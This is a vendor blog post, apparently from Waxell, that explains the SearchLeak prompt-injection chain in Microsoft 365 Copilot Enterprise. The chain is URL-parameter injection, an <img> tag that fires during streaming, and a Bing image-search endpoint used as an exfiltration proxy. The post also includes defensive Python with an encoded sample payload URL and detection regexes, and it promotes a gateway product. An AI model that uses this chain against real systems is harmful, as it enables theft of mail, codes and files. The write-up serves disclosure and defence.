Logan Kelly

CVE-2026-42824 SearchLeak: How M365 Copilot Became a One-Click Data Exfiltration Tool

CVE-2026-42824 turned Copilot into a one-click exfiltration tool. Emails, MFA codes, files—gone. Here's what governance stops that a patch can't.

CVE-2026-42824, named "SearchLeak" by Varonis Threat Labs researchers who discovered it, is a critical three-stage vulnerability chain in Microsoft 365 Copilot Enterprise. It allowed an attacker to exfiltrate emails, one-time passwords, password reset links, calendar entries, and indexed organizational files — with a single click on a crafted link and no additional permissions required on the attacker's side. Microsoft patched the vulnerability at the backend in early June 2026 and publicly disclosed it under a critical severity rating on June 15, 2026. No tenant administrator action is required to apply the fix.

The attack targets M365 Copilot Enterprise specifically — the tier with access to the organization's full data estate, including Exchange, SharePoint, OneDrive, and Teams. That scope of access is what made the blast radius significant. Depending on how broadly Copilot was connected to the M365 environment, anything the victim's account could read, Copilot could retrieve and exfiltrate.

How SearchLeak Works: Three Bugs That Shouldn't Exist Together

Varonis chained three distinct weaknesses to produce the attack. Individually, each is insufficient for meaningful exploitation. Together, they give an attacker silent read access to a victim's mailbox and indexed organizational content in a single click.

Stage 1 — Parameter-to-Prompt Injection (P2P). Microsoft 365 Copilot Enterprise Search accepts a q URL parameter for search queries. The problem: that parameter was not treated as user-supplied search input — it was passed directly to Copilot's AI engine as an executable instruction. An attacker who could get a victim to click a crafted m365.cloud.microsoft/search/?q=<PAYLOAD> URL could control what Copilot searched for and what it did with the results. No authentication on the attacker's side. No elevated permissions. Just a link.

Stage 2 — HTML Rendering Race Condition. To prevent AI-generated HTML from executing, Microsoft wrapped Copilot responses in <code> blocks. The catch: this wrapping happened after the streaming response completed. During streaming, raw HTML was temporarily rendered by the browser. An injected <img> tag in the AI's output fired — triggering an outbound HTTP request carrying stolen data — before the sanitizer activated. By the time the guardrail engaged, the request had already left.

Stage 3 — CSP Bypass via Bing SSRF. The browser's Content Security Policy blocked images loading from arbitrary domains. But Bing's "Search by Image" endpoint (bing.com/images/searchbyimage?imgurl=…) was allowlisted in the CSP. When the injected <img> tag pointed to this Bing endpoint with stolen data embedded in the URL parameter, Bing's backend made a server-side fetch to retrieve the "image" from the attacker's server. The CSP applied to the victim's browser, not to Bing's infrastructure. Bing became an unwitting exfiltration proxy.

The complete chain: victim clicks link → Copilot interprets q parameter as search instructions → searches mailbox and indexed org content → generates response with embedded <img> tag → image fires during streaming, before sanitization → Bing fetches attacker URL with stolen data in the path → attacker reads email subjects, OTP codes, file names from server logs. No second click. The crafted link pointed to a Microsoft-owned domain (m365.cloud.microsoft), bypassing standard anti-phishing URL filters.

Why Do AI Assistants With Broad Data Access Keep Producing This Class of Vulnerability?

SearchLeak isn't the first time M365 Copilot has been the vector for prompt injection-driven data exfiltration. Varonis previously discovered "Reprompt" in Copilot Personal. Similar patterns — AI assistant processes injected instructions from user-controlled inputs, then acts outside the user's actual intent — have been documented across LangChain, AutoGen, and Semantic Kernel deployments.

The structural reason these vulnerabilities keep appearing is a mismatch between how enterprise AI assistants are designed and the threat model they operate under.

Enterprise AI assistants are built to be maximally helpful: search everything the user can access, render rich responses, integrate with the full data estate. The security assumption is that the AI's output represents the user's intent — if Copilot generates an image request or a formatted response, it's acting for the authenticated user, not an attacker who injected instructions into the query string.

Parameter-to-Prompt Injection breaks that assumption at the input layer. If any user-controlled input — a URL parameter, a retrieved document, a calendar event body, a Teams message — can modify what the model believes it should do, the model's output is no longer a reliable proxy for user intent. The same logic applies to indirect prompt injection, where an attacker embeds instructions in a document that an agent later retrieves and processes.

Pre-execution enforcement — checking what the AI is about to do before it does it — doesn't exist at the application layer in most enterprise AI assistants today. They sanitize output. SearchLeak demonstrates why output sanitization as a post-processing step fails when AI responses stream: the side effects fire before the sanitizer catches up.
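As an added illustration (not code from this post, from Varonis, or from Microsoft), this Python model contrasts the two rendering orders described above: a simplified DOM in which any <img src> that lands fires a fetch, once with the <code> wrapping applied only after the stream ends and once with each chunk escaped before it reaches the DOM. The chunk contents and the collector host are constructed.

```python
import html
import re

# Constructed sample of a streamed assistant reply. The <img> tag stands in for
# the kind of markup the post describes; the host is a reserved example name.
CHUNKS = [
    "Here are your recent messages:\n",
    "1. Subject: Your verification code ",
    '<img src="https://example.invalid/collect?d=REDACTED">',
    "\n2. Subject: Quarterly planning\n",
]

IMG_SRC = re.compile(r'<img\s[^>]*src="([^"]+)"', re.IGNORECASE)


class FakeDom:
    """Simplified browser model: an <img src> fires a fetch the moment its markup
    is appended (assumes a tag arrives whole within one chunk)."""

    def __init__(self):
        self.markup = ""
        self.fetches = []

    def append(self, fragment):
        self.markup += fragment
        self.fetches.extend(IMG_SRC.findall(fragment))


def render_wrap_after_stream(chunks):
    """Vulnerable order: raw chunks hit the DOM as they stream; the <code>
    wrapping and escaping happen only after the last chunk arrives."""
    dom = FakeDom()
    for chunk in chunks:
        dom.append(chunk)
    dom.markup = "<code>" + html.escape(dom.markup) + "</code>"  # too late
    return dom.fetches


def render_escape_each_chunk(chunks):
    """Safer order: every chunk is escaped before it reaches the DOM, so no
    tag is ever live, regardless of when the stream finishes."""
    dom = FakeDom()
    dom.append("<code>")
    for chunk in chunks:
        dom.append(html.escape(chunk))
    dom.append("</code>")
    return dom.fetches
```

The first function returns one fired fetch even though its final markup is fully escaped; the second returns none, which is the property a streaming renderer has to guarantee per chunk rather than per response.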

What Should Teams Running M365 Copilot Do Right Now?

The backend patch closes the specific SearchLeak chain. A few actions are worth taking regardless.

Confirm the patch applies to your tenant. Because Microsoft applied this server-side, no admin action is required — but confirm with your Microsoft account team that your Copilot Enterprise instance is on the patched version, particularly if you operate in a sovereign cloud or GCC environment with delayed rollouts.

Audit Copilot's indexed data scope. The blast radius of SearchLeak depended entirely on what Copilot had read access to. Review what SharePoint sites, Exchange mailboxes, and OneDrive folders Copilot's search index includes, and apply least-privilege — restrict indexing to what users actually need Copilot to reach.

Review M365 Unified Audit Logs for anomalous Copilot Search URL patterns. SearchLeak required a victim to click a crafted URL. If users received suspicious links to Copilot Search between Copilot Enterprise's launch and June 15, log review is warranted. Look for q parameters in the audit logs that contain HTML tags or encoded image URLs pointing to Bing's search-by-image endpoint.
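Added example, not from this post or from Microsoft: a Python triage helper that applies the check described above to a constructed export of Copilot Search URLs, flagging any q parameter that decodes to HTML tags or to Bing's search-by-image endpoint. The record field names Id, UserId and Url are an assumption about the export format, not the Unified Audit Log schema, and the host example.invalid is a placeholder.

```python
import json
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample export. Field names are assumed, not the real audit schema.
SAMPLE_LOG = json.dumps([
    {"Id": "1", "UserId": "alice@example.com",
     "Url": "https://m365.cloud.microsoft/search/?q=quarterly%20budget"},
    {"Id": "2", "UserId": "bob@example.com",
     "Url": "https://m365.cloud.microsoft/search/?q=%3Cimg%20src%3D%22https%3A%2F%2F"
            "www.bing.com%2Fimages%2Fsearchbyimage%3Fimgurl%3Dhttps%3A%2F%2F"
            "example.invalid%2Fx%22%3E"},
    {"Id": "3", "UserId": "carol@example.com",  # double-encoded tag
     "Url": "https://m365.cloud.microsoft/search/?q=%2520%253Cimg%2520src%253Dx%253E"},
    {"Id": "4", "UserId": "dave@example.com",  # benign mention of bing.com
     "Url": "https://m365.cloud.microsoft/search/?q=find%20the%20bing.com%20contract"},
])

HTML_TAG = re.compile(r"<[a-z!/]", re.IGNORECASE)  # coarse: any tag-like opener
BING_IMG = re.compile(r"bing\.com/images/searchbyimage|imgurl=", re.IGNORECASE)


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so layered encodings do not hide a tag."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_reasons(url):
    """Return the reasons a Copilot Search URL looks crafted (empty if clean)."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if not host.endswith("m365.cloud.microsoft") or not parts.path.startswith("/search"):
        return []
    reasons = []
    for q in parse_qs(parts.query).get("q", []):
        q = fully_decode(q)
        if HTML_TAG.search(q):
            reasons.append("html_tag_in_q")
        if BING_IMG.search(q):
            reasons.append("bing_searchbyimage_in_q")
    return reasons


def flag_records(log_json):
    """Yield (Id, UserId, reasons) for every record whose URL is suspicious."""
    hits = []
    for rec in json.loads(log_json):
        reasons = suspicious_reasons(rec.get("Url", ""))
        if reasons:
            hits.append((rec["Id"], rec["UserId"], reasons))
    return hits
```

Records 2 and 3 are flagged (the double-encoded one only after the second decode pass); record 4 is not, because a plain mention of bing.com in a query is not the image endpoint.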

Add P2P injection to your threat model. Any AI system where a URL parameter, tool description, or retrieved document reaches the LLM without strict type enforcement is susceptible to this class of attack. It's not yet standard in most threat modeling frameworks — but it should be.

How Waxell MCP Gateway Handles This Class of Attack

SearchLeak exploited the gap between what an AI assistant was trusted to do and what it actually did once an attacker injected instructions at the input layer. That gap — AI assistants with broad data access operating without a pre-execution enforcement layer — is a governance problem that a patch addresses only in its specific form.

Waxell MCP Gateway sits between AI clients (Claude Desktop, Claude Code, Cursor, and any MCP-compatible client) and the 160+ upstream MCP connectors those clients use. That position — at the tool call boundary, before tool calls execute — lets it enforce controls the AI client itself cannot.

Prompt injection scanner at fingerprint time. When an MCP tool registers with the gateway, Waxell scans its tool descriptions for injected instructions before any agent call reaches it. The P2P injection vector in SearchLeak (malicious instructions passed to the model via a user-controlled input field) is the same class of attack the prompt injection scanner is built to catch in tool description parameters. Tools with injected override instructions are flagged and held for review before a single agent call fires — not after the data has already moved.

PII redaction and secret blocking in-flight. The most operationally damaging output of SearchLeak was one-time passwords, password reset links, and email content. Waxell MCP Gateway strips PII — email addresses, SSNs, financial data — and blocks secrets (security codes, API tokens, password reset links) before they can transit the gateway to any downstream endpoint. The gateway's 50+ policy categories include specific policies for identity, privacy, and content — enforced at 0.045ms p95 latency, meaning governance doesn't introduce meaningful overhead. Even if an injected prompt succeeded in retrieving sensitive content, it couldn't exit the organization's perimeter through the gateway.

Human-in-the-loop approvals for external data sends. The SSRF chain in SearchLeak relied on data leaving the organization via an outbound HTTP request initiated by Bing's backend. Waxell MCP Gateway can require human approval for any tool call that would result in data leaving the organization's environment — surfacing the action for a human reviewer before it completes, rather than letting it fire silently during a streaming response.

Durable audit trail. The gateway maintains an exportable log of every tool call: what the agent requested, what arguments it passed, what the tool returned. A SearchLeak-class exfiltration attempt would appear in the log as an anomalous outbound data pattern. Paired with Waxell Observe, which instruments the AI client side across 200+ libraries and frameworks, you get a full trace from model inference through tool execution.

Microsoft's patch addresses the specific implementation flaw. The governance model addresses the class: any AI assistant with broad data access that lacks a pre-execution enforcement layer at the tool call boundary will remain exposed to variants of this chain as AI assistants expand their integrations.

Try Waxell MCP Gateway free — no rebuild required, one URL replaces all upstream MCP configurations — at waxell.dev/signup.

Frequently Asked Questions

What is CVE-2026-42824 SearchLeak?
CVE-2026-42824 is a critical three-stage vulnerability chain in Microsoft 365 Copilot Enterprise, named SearchLeak by Varonis Threat Labs researchers who discovered it. It combines a Parameter-to-Prompt Injection weakness, an HTML rendering race condition, and a CSP bypass via Bing's server-side request forgery to enable one-click exfiltration of emails, MFA codes, password reset links, and indexed organizational files. Microsoft patched it with a backend fix publicly disclosed on June 15, 2026.

Does SearchLeak require special permissions or multiple steps from the attacker?
No. The attacker needs only to get a victim to click a crafted URL pointing to m365.cloud.microsoft — a legitimate Microsoft domain. No elevated permissions, no plugins, and no second user action are required. From the victim's perspective, Copilot appears to briefly "think" before the exfiltration completes silently in the background.

What data could SearchLeak steal?
Email subject lines and content — including security codes, one-time passwords, and password reset links — calendar meeting details and attendee information, SharePoint documents, OneDrive files, and any other organizational content indexed by Copilot Enterprise Search.

Is patching M365 Copilot enough to prevent similar attacks in the future?
The specific SearchLeak chain is closed. But P2P injection, indirect prompt injection via retrieved content, and SSRF-based exfiltration are a class of attack, not a single bug. Varonis documented this chain in Copilot Enterprise; they previously found a related variant in Copilot Personal. Similar patterns exist in other AI assistant frameworks. AI assistants with broad data access that don't enforce pre-execution controls at the tool call boundary remain exposed to future variants.

What makes SearchLeak different from standard prompt injection?
Standard indirect prompt injection typically requires an attacker to embed malicious instructions in content the model retrieves — a document, a web page, a database row. SearchLeak uses Parameter-to-Prompt injection, where the attack vector is a URL query parameter that Copilot passed directly to its AI engine as an instruction. Combined with a race condition that fires the exfiltration during response streaming before any sanitization pass, it produced a more reliable and lower-friction attack than indirect injection typically achieves.

How does a governance layer at the MCP level help with a vulnerability in a Microsoft product?
The harm in SearchLeak occurred at the tool call layer — Copilot executed a search (tool call), generated a response that triggered an outbound request (side effect), and data left the organization (the actual damage). A governed tool layer that scans descriptions for injection, blocks secrets from exiting the perimeter, and requires human approval for outbound data sends addresses the mechanism of harm rather than only the specific implementation bug. Governance and patching are complementary, not interchangeable.

Waxell

Waxell provides observability and governance for AI agents in production. Bring your own framework.

© 2026 Waxell. All rights reserved.

Patent Pending.
